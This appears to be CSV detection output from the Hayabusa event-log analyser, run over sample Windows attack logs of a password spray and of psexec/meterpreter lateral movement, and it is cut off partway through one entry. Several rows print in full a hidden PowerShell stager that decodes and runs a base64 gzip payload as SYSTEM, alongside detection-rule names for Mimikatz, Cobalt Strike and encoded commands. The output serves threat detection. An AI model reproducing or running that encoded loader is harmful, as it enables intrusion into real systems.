2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 05:26:51.793 +09:00,IEWIN7,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,Exec,PowerShell as a Service in Registry,,../hayabusa-rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations in Registry,,../hayabusa-rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3348 | PGUID: 365ABB72-AF8B-5CC8-0000-00101C1A1900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec | C2,Curl Start Combination,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,info,,Process Created,"Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 3872 | PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+